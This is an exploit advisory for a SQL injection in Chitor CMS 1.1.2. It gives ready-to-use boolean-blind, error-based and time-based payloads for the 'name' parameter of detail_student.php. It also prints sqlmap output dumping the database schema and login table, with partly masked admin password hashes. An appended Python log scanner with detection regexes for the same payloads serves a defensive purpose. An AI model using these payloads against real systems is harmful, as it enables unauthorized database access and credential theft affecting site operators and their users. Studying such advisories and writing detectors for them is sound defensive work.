Chitor CMS 1.1.2 SQL Injection
Chitor CMS version 1.1.2 suffers from a remote SQL injection vulnerability. Original discovery of this finding is attributed to msd0pe in April of 2023.
[ Vulnerability ]

Author    : CraCkEr
Website   : https://github.com/waqaskanju/Chitor-CMS
Vendor    : Waqas Ahmad
Software  : Chitor-CMS 1.1.2
Vuln Type : SQL Injection
Impact    : Database Access

Release Notes:
SQL injection attacks can allow unauthorized access to sensitive data and modification of data, and can crash the application or make it unavailable, leading to lost revenue and damage to a company's reputation.

Greets: The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL
CryptoJob (Twitter) twitter.com/0x0CryptoJob

© CraCkEr 2023

Path: /detail_student.php

/detail_student.php?name=[SQLI]&search=Search

GET parameter 'name' is vulnerable to SQLI

---
Parameter: name (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: name=123' AND 7885=7885#&search=Search

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: name=123' AND (SELECT 9128 FROM(SELECT COUNT(*),CONCAT(0x71716b6271,(SELECT (ELT(9128=9128,1))),0x716a6b6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- DaVE&search=Search

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: name=123' AND (SELECT 1784 FROM (SELECT(SLEEP(5)))AjPI)-- FsLQ&search=Search
---

GET parameter 'name' is vulnerable to SQLI

[+] Starting the Attack

fetching current database
current database: '**********_chitor_db'

fetching tables for database: '**********_chitor_db'
Database: **********_chitor_db
[12 tables]
+-----------------+
| position        |
| class_subjects  |
| employees       |
| login           |
| marks           |
| school_classes  |
| schools         |
| setting         |
| students_info   |
| subject_teacher |
| subjects        |
| tab_index       |
+-----------------+

fetching columns for table 'login' in database '**********_chitor_db'
Table: login
[5 columns]
+-------------+--------------+
| Column      | Type         |
+-------------+--------------+
| Password    | varchar(256) |
| Status      | int(11)      |
| Employee_Id | int(11)      |
| Id          | int(11)      |
| User_Name   | varchar(30)  |
+-------------+--------------+

fetching entries of column(s) 'Employee_Id,Id,User_Name,`Password`,`Status`' for table 'login' in database '**********_chitor_db'
Table: login
[3 entries]
+----+--------+-----------------------------------------+-------------+------------+
| Id | Status | Password                                | Employee_Id | User_Name  |
+----+--------+-----------------------------------------+-------------+------------+
| 1  | 1      | *****1a7fdd83dd1e2a309ce759***** (****) | 1           | Guest      |
| 2  | 1      | *****82fb3cee50d9272ba79822*****        | 2           | **qa*kan** |
| 3  | 1      | *****f297a57a5a743894a0e4a8***** (****) | 3           | admin      |
+----+--------+-----------------------------------------+-------------+------------+

[-] Done
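As an added example (not part of this advisory or of the Chitor CMS project), the Python below scans web-server access-log lines for requests against the detail_student.php 'name' parameter that carry the three sqlmap techniques listed above, so a defender can spot the probing in logs; the log lines are constructed samples and the signature patterns are this example's own assumptions.

```python
import re
from urllib.parse import parse_qs

VULN_PATH, VULN_PARAM = "/detail_student.php", "name"

# One pattern per sqlmap technique reported above, applied to the URL-decoded value.
SIGNATURES = {
    # boolean-based blind:  123' AND 7885=7885#
    "boolean-blind": re.compile(r"'\s*(and|or)\s+\d+\s*=\s*\d+\s*(#|--)", re.I),
    # error-based (FLOOR):  ... FLOOR(RAND(0)*2) ... FROM INFORMATION_SCHEMA ...
    "error-based": re.compile(r"floor\s*\(\s*rand\s*\(\s*0\s*\)\s*\*\s*2\s*\)", re.I),
    # time-based blind:     ... SELECT(SLEEP(5)) ...
    "time-blind": re.compile(r"\bsleep\s*\(\s*\d+\s*\)", re.I),
}

# Combined log format prefix: client ident user [time] "METHOD target PROTO" status
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')

def classify_target(target: str) -> list[str]:
    """Return the techniques whose signature appears in the decoded 'name' value."""
    path, _, query = target.partition("?")
    if not path.endswith(VULN_PATH):
        return []
    # parse_qs percent-decodes and maps '+' to space, so %27 / %23 become ' and #.
    values = parse_qs(query, keep_blank_values=True).get(VULN_PARAM, [])
    return [name for name, rx in SIGNATURES.items()
            if any(rx.search(v) for v in values)]

def scan_log(lines: list[str]) -> list[tuple[str, str]]:
    """Return (client_ip, technique) for every suspicious request in the log."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        for technique in classify_target(m.group(3)):
            hits.append((m.group(1), technique))
    return hits

# Constructed sample access-log lines, percent-encoded as a client would send them.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Apr/2023:12:00:01 +0000] "GET /detail_student.php?name=123%27%20AND%207885%3D7885%23&search=Search HTTP/1.1" 200 512',
    '203.0.113.5 - - [10/Apr/2023:12:00:02 +0000] "GET /detail_student.php?name=123%27%20AND%20%28SELECT%209128%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x71716b6271%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x%29a%29--%20DaVE&search=Search HTTP/1.1" 500 211',
    '198.51.100.7 - - [10/Apr/2023:12:00:09 +0000] "GET /detail_student.php?name=123%27%20AND%20%28SELECT%201784%20FROM%20%28SELECT%28SLEEP%285%29%29%29AjPI%29--%20FsLQ&search=Search HTTP/1.1" 200 512',
    '192.0.2.44 - - [10/Apr/2023:12:01:00 +0000] "GET /detail_student.php?name=John+Smith&search=Search HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for ip, technique in scan_log(SAMPLE_LOG):
        print(f"{ip}: {technique} SQLi attempt against {VULN_PATH}")
```

The benign fourth line is not reported; the patterns are deliberately narrow to the techniques in this advisory and should be widened for production use.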